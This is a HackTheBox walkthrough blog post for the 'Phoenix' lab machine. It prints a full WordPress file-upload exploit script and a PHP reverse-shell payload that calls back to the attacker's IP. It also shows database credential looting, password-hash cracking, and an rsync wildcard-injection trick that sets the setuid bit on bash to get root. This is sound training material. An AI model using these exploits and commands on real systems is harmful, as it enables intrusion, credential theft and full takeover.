Skip to main content
K4oS writeups

Phoenix – HackTheBox

K4oS 3 years ago

IP -> 10.10.11.149

We start off with an nmap scan

$ nmap -sCV -v -p- 10.10.11.149
22/tcp  open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 9d:f3:87:cd:34:75:83:e0:3f:50:d8:39:c6:a5:32:9f (RSA)
|   256 ab:61:ce:eb:ed:e2:86:76:e9:e1:52:fa:a5:c7:7b:20 (ECDSA)
|_  256 26:2e:38:ca:df:72:d4:54:fc:75:a4:91:65:cc:e8:b0 (ED25519)
80/tcp  open  http     Apache httpd
|_http-server-header: Apache
|_http-title: Did not follow redirect to https://phoenix.htb/
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
443/tcp open  ssl/http Apache httpd
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|   h2
|_  http/1.1
|_http-server-header: Apache
| ssl-cert: Subject: commonName=phoenix.htb/organizationName=Phoenix Security Ltd./stateOrProvinceName=Arizona/countryName=US
| Issuer: commonName=phoenix.htb/organizationName=Phoenix Security Ltd./stateOrProvinceName=Arizona/countryName=US
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-02-15T20:08:43
| Not valid after:  2032-02-13T20:08:43
| MD5:   320f c0ee 2f18 bd78 3abc e9d8 66a6 fc26
|_SHA-1: 6879 3f3b c7d3 a517 6785 bcc7 a726 51ce 8827 4a68
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 1 disallowed entry 
|_/wp-admin/
|_http-title: Did not follow redirect to https://phoenix.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Alright! We have port 22 running SSH, port 80 running HTTP, and port 443 running HTTPS.

When we access the website we get redirected to https://phoenix.htb. So let’s add it to our /etc/hosts file.

10.10.11.149 phoenix.htb

And let’s refresh the page!

On nmap we saw that this site is running wordpress, so let’s run wpscan!

$ wpscan --url https://phoenix.htb/ -e p --plugins-detection mixed --disable-tls-checks
...
[+] accordion-slider-gallery
 | Location: https://phoenix.htb/wp-content/plugins/accordion-slider-gallery/
 | Latest Version: 2.2
 | Last Updated: 2022-05-07T11:22:00.000Z
 |
 | Found By: Urls In Homepage (Passive Detection)
 | Confirmed By: Urls In 404 Page (Passive Detection)
 |
 | The version could not be determined.

[+] akismet
 | Location: https://phoenix.htb/wp-content/plugins/akismet/
 | Latest Version: 4.2.4
 | Last Updated: 2022-05-20T09:58:00.000Z
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - https://phoenix.htb/wp-content/plugins/akismet/, status: 500
 |
 | The version could not be determined.

[+] asgaros-forum
 | Location: https://phoenix.htb/wp-content/plugins/asgaros-forum/
 | Last Updated: 2022-01-30T12:54:00.000Z
 | [!] The version is out of date, the latest version is 2.0.0
 |
 | Found By: Urls In Homepage (Passive Detection)
 | Confirmed By: Urls In 404 Page (Passive Detection)
 |
 | Version: 1.15.12 (10% confidence)
 | Found By: Query Parameter (Passive Detection)
 |  - https://phoenix.htb/wp-content/plugins/asgaros-forum/skin/widgets.css?ver=1.15.12

[+] photo-gallery-builder
 | Location: https://phoenix.htb/wp-content/plugins/photo-gallery-builder/
 | Latest Version: 2.3
 | Last Updated: 2022-05-07T11:20:00.000Z
 |
 | Found By: Urls In Homepage (Passive Detection)
 | Confirmed By: Urls In 404 Page (Passive Detection)
 |
 | The version could not be determined.

[+] pie-register
 | Location: https://phoenix.htb/wp-content/plugins/pie-register/
 | Latest Version: 3.7.5.1
 | Last Updated: 2022-06-13T07:37:00.000Z
 |
 | Found By: Urls In Homepage (Passive Detection)
 | Confirmed By: Urls In 404 Page (Passive Detection)
 |
 | The version could not be determined.

[+] timeline-event-history
 | Location: https://phoenix.htb/wp-content/plugins/timeline-event-history/
 | Latest Version: 2.2
 | Last Updated: 2022-05-07T11:26:00.000Z
 |
 | Found By: Urls In Homepage (Passive Detection)
 | Confirmed By: Urls In 404 Page (Passive Detection)
 |
 | The version could not be determined.
.....

There aren’t any interesting plugins that we can exploit.

After looking around I found that there was a plugin that wasn’t showing in our scan which is the “download from files” plugin version 1.4.8, which is vulnerable to file upload.
I will be using the following modified exploit from https://www.exploit-db.com/exploits/50287.
It was modified to accept self-signed HTTPS certificates.

import os.path
from os import path
import json
import requests;
import sys

def print_banner():
	print("Download From Files <= 1.48 - Arbitrary File Upload")
	print("Author -> spacehen (www.github.com/spacehen)")

def print_usage():
	print("Usage: python3 exploit.py [target url] [php file]")
	print("Ex: python3 exploit.py https://example.com ./shell.(php4/phtml)")

def vuln_check(uri):
	response = requests.get(uri, verify=False)
	raw = response.text

	if ("Sikeres" in raw):
		return True;
	else:
		return False;

def main():

	print_banner()
	if(len(sys.argv) != 3):
		print_usage();
		sys.exit(1);

	base = sys.argv[1]
	file_path = sys.argv[2]

	ajax_action = 'download_from_files_617_fileupload'
	admin = '/wp-admin/admin-ajax.php';

	uri = base + admin + '?action=' + ajax_action ;
	check = vuln_check(uri);

	if(check == False):
		print("(*) Target not vulnerable!");
		sys.exit(1)

	if( path.isfile(file_path) == False):
		print("(*) Invalid file!")
		sys.exit(1)

	files = {'files[]' : open(file_path)}
	data = {
	"allowExt" : "php4,phtml",
	"filesName" : "files",
    "maxSize" : "1000",
    "uploadDir" : "."
	}
	print("Uploading Shell...");
	response = requests.post(uri, files=files, data=data, verify=False )
	file_name = path.basename(file_path)
	if("ok" in response.text):
		print("Shell Uploaded!")
		if(base[-1] != '/'):
			base += '/'
		print(base + "wp-admin/" + file_name);
	else:
		print("Shell Upload Failed")
		sys.exit(1)

main();

Now we need the code to be uploaded. So I created a file shell.phtml with the following contents:

<?php system("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.53/1234 0>&1'"); ?>

Okay let’s setup our netcat listener and run the script!

python3 50287.py https://phoenix.htb shell.phtml
Download From Files <= 1.48 - Arbitrary File Upload
Author -> spacehen (www.github.com/spacehen)
/usr/lib/python3.10/site-packages/urllib3/connectionpool.py:1043: InsecureRequestWarning: Unverified HTTPS request is being made to host 'phoenix.htb'. Adding certificate verification is strongly advised. See: https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html#ssl-warnings
  warnings.warn(
Uploading Shell...
/usr/lib/python3.10/site-packages/urllib3/connectionpool.py:1043: InsecureRequestWarning: Unverified HTTPS request is being made to host 'phoenix.htb'. Adding certificate verification is strongly advised. See: https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html#ssl-warnings
  warnings.warn(
Shell Uploaded!
https://phoenix.htb/wp-admin/shell.phtml

And in our netcat session:

$ nc -lvnp 1234
Connection from 10.10.11.149:33478
wp_user@phoenix:~/wordpress/wp-admin$ id
uid=1001(wp_user) gid=1001(wp_user) groups=1001(wp_user)

Now let’s run linpeas!

$ bash linpeas.sh
....SNIP..
ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.11.149  netmask 255.255.254.0  broadcast 10.10.11.255
        inet6 fe80::250:56ff:feb9:e888  prefixlen 64  scopeid 0x20<link>
        inet6 dead:beef::250:56ff:feb9:e888  prefixlen 64  scopeid 0x0<global>
        ether 00:50:56:b9:e8:88  txqueuelen 1000  (Ethernet)
        RX packets 149972  bytes 16300516 (16.3 MB)
        RX errors 0  dropped 1041  overruns 0  frame 0
        TX packets 120100  bytes 36534553 (36.5 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

eth0: flags=195<UP,BROADCAST,RUNNING,NOARP>  mtu 1500
        inet 10.11.12.13  netmask 255.255.255.0  broadcast 0.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 1976  bytes 204216 (204.2 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 1976  bytes 204216 (204.2 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 
.........
define( 'DB_USER', 'wordpress' );
define( 'DB_PASSWORD', '<++32%himself%FIRM%section%32++>' );
.........
╔══════════╣ Unexpected in root
/backups
.....

So we have two network adapters with different IP adresses, which we will investigate a bit later. We also have credentials for the wordpress database with the “wordpress” user and a /backups folder which we will inspect later.

Let’s get the usernames from the mysql databse.

$ mysql -u wordpress -p
password: <++32%himself%FIRM%section%32++>

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 2864
Server version: 8.0.28-0ubuntu0.20.04.3 (Ubuntu)

Copyright (c) 2000, 2022, Oracle and/or its affiliates.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> use wordpress;
mysql> select user_login,user_pass from wp_users;
+------------+------------------------------------+
| user_login | user_pass                          |
+------------+------------------------------------+
| Phoenix    | $P$BA5zlC0IhOiJKMTK.nWBgUB4Lxh/gc. |
| john       | $P$B8eBH6QfVODeb/gYCSJRvm9MyRv7xz. |
| Jsmith     | $P$BV5kUPHrZfVDDWSkvbt/Fw3Oeozb.G. |
| Jane       | $P$BJCq26vxPmaQtAthFcnyNv1322qxD91 |
| Jack       | $P$BzalVhBkVN.6ii8y/nbv3CTLbC0E9e. |
| user1      | $P$BfVdS7OmYoUg3794foF0AH5Lh6Df2v0 |
+------------+------------------------------------+
6 rows in set (0.00 sec)

Inspecting /etc/passwd we find that there are two users.

phoenix:x:1000:1000:Phoenix:/home/phoenix:/bin/bash
editor:x:1002:1002:John Smith,1,1,1,1:/home/editor:/bin/bash

Okay! So I am guessing that John Smith is Jsmith in wordpress.
Let’s crack the password!

$ john hashes --wordlist=rockyou.txt
Warning: detected hash type "phpass", but the string is also recognized as "PHPass-opencl"
Use the "--format=PHPass-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (phpass [phpass ($P$ or $H$) 128/128 AVX 4x3])
Cost 1 (iteration count) is 8192 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:04:23 12.06% (ETA: 15:16:16) 0g/s 7253p/s 7253c/s 7253C/s cocacola#1..cobalt20
0g 0:00:06:36 18.39% (ETA: 15:15:47) 0g/s 7207p/s 7207c/s 7207C/s vonzti..vontee9
superphoenix     (Jsmith)
1g 0:00:08:04 DONE (2022-06-18 14:47) 0.002064g/s 7167p/s 7167c/s 7167C/s superphoenix..superorigina
Use the "--show --format=phpass" options to display all of the cracked passwords reliably
Session completed

Great! We found credentials for the user editor!

Let’s try and ssh in:

$ ssh [email protected]

$$$$$$$\  $$\                                     $$\           
$$  __$$\ $$ |                                    \__|          
$$ |  $$ |$$$$$$$\   $$$$$$\   $$$$$$\  $$$$$$$\  $$\ $$\   $$\ 
$$$$$$$  |$$  __$$\ $$  __$$\ $$  __$$\ $$  __$$\ $$ |\$$\ $$  |
$$  ____/ $$ |  $$ |$$ /  $$ |$$$$$$$$ |$$ |  $$ |$$ | \$$$$  / 
$$ |      $$ |  $$ |$$ |  $$ |$$   ____|$$ |  $$ |$$ | $$  $$<  
$$ |      $$ |  $$ |\$$$$$$  |\$$$$$$$\ $$ |  $$ |$$ |$$  /\$$\ 
\__|      \__|  \__| \______/  \_______|\__|  \__|\__|\__/  \__|
([email protected]) Password: superphoenix
([email protected]) Verification code:

A verification code? Let’s skip over and inspect the other network adapter and open ports.

$ nc 10.11.12.13 22 -v
Connection to 10.11.12.13 22 port [tcp/ssh] succeeded!
SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.4

Okay! Let’s try connecting to this IP!

$ ssh [email protected]

$$$$$$$\  $$\                                     $$\           
$$  __$$\ $$ |                                    \__|          
$$ |  $$ |$$$$$$$\   $$$$$$\   $$$$$$\  $$$$$$$\  $$\ $$\   $$\ 
$$$$$$$  |$$  __$$\ $$  __$$\ $$  __$$\ $$  __$$\ $$ |\$$\ $$  |
$$  ____/ $$ |  $$ |$$ /  $$ |$$$$$$$$ |$$ |  $$ |$$ | \$$$$  / 
$$ |      $$ |  $$ |$$ |  $$ |$$   ____|$$ |  $$ |$$ | $$  $$<  
$$ |      $$ |  $$ |\$$$$$$  |\$$$$$$$\ $$ |  $$ |$$ |$$  /\$$\ 
\__|      \__|  \__| \______/  \_______|\__|  \__|\__|\__/  \__|
Password: superphoenix

Welcome to Ubuntu 20.04.4 LTS (GNU/Linux 5.4.0-96-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sat 18 Jun 2022 02:48:02 PM UTC

  System load:             0.0
  Usage of /:              69.7% of 4.36GB
  Memory usage:            27%
  Swap usage:              0%
  Processes:               269
  Users logged in:         1
  IPv4 address for ens160: 10.10.11.149
  IPv6 address for ens160: dead:beef::250:56ff:feb9:e888
  IPv4 address for eth0:   10.11.12.13


8 updates can be applied immediately.
8 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Sat Jun 18 14:12:36 2022 from 10.11.12.13
editor@phoenix:~$ id
uid=1002(editor) gid=1002(editor) groups=1002(editor)
<!-- wp:code -->
<pre class="wp-block-code"><code>$ ssh [email protected]

$$$$$$$\  $$\                                     $$\           
$$  __$$\ $$ |                                    \__|          
$$ |  $$ |$$$$$$$\   $$$$$$\   $$$$$$\  $$$$$$$\  $$\ $$\   $$\ 
$$$$$$$  |$$  __$$\ $$  __$$\ $$  __$$\ $$  __$$\ $$ |\$$\ $$  |
$$  ____/ $$ |  $$ |$$ /  $$ |$$$$$$$$ |$$ |  $$ |$$ | \$$$$  / 
$$ |      $$ |  $$ |$$ |  $$ |$$   ____|$$ |  $$ |$$ | $$  $$&lt;  
$$ |      $$ |  $$ |\$$$$$$  |\$$$$$$$\ $$ |  $$ |$$ |$$  /\$$\ 
\__|      \__|  \__| \______/  \_______|\__|  \__|\__|\__/  \__|
Password: superphoenix

Welcome to Ubuntu 20.04.4 LTS (GNU/Linux 5.4.0-96-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sat 18 Jun 2022 02:48:02 PM UTC

  System load:             0.0
  Usage of /:              69.7% of 4.36GB
  Memory usage:            27%
  Swap usage:              0%
  Processes:               269
  Users logged in:         1
  IPv4 address for ens160: 10.10.11.149
  IPv6 address for ens160: dead:beef::250:56ff:feb9:e888
  IPv4 address for eth0:   10.11.12.13


8 updates can be applied immediately.
8 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Sat Jun 18 14:12:36 2022 from 10.11.12.13
editor@phoenix:~$ id
uid=1002(editor) gid=1002(editor) groups=1002(editor)
editor@phoenix:~$ cat user.txt
968fa50dbd8b4d....

Great! We logged in!

After a bit of time enumerating I found an odd script in /usr/local/bin named “cron.sh.x”
Running strings didn’t get me anywhere so I got pspy64 running and ran the file.

$ ./pspy64s
...SNIP...
#!/bin/sh

NOW=$(date +"%Y-%m-%d-%H-%M")
FILE="phoenix.htb.$NOW.tar"

cd /backups
mysqldump -u root wordpress > dbbackup.sql
tar -cf $FILE dbbackup.sql && rm dbbackup.sql
gzip -9 $FILE
find . -type f -mmin +30 -delete
rsync --ignore-existing -t *.* [email protected]:/backups/
...

It directly gave us the contents of the script!
Analysing it we find that it’s running rsync with a wildward, which makes it vulnerable to wildcard injection.
Let’s go to backups and run the following to inject an argument and run our own script

$ cd /backups
$ touch -- "-e sh stuid.sh"
$ echo "chmod +s /bin/bash" > stuid.sh

After waiting a bit we find that the setUID bit is set for the /bin/bash program!
Let’s run it:

$ /bin/bash -p
bash-5.0# id
uid=1002(editor) gid=1002(editor) euid=0(root) egid=0(root) groups=0(root),1002(editor)
bash-5.0# cat /root/root.txt
c9fb2e679b706ee31....

I hope you enjoyed the writeup as much as I enjoyed doing this box!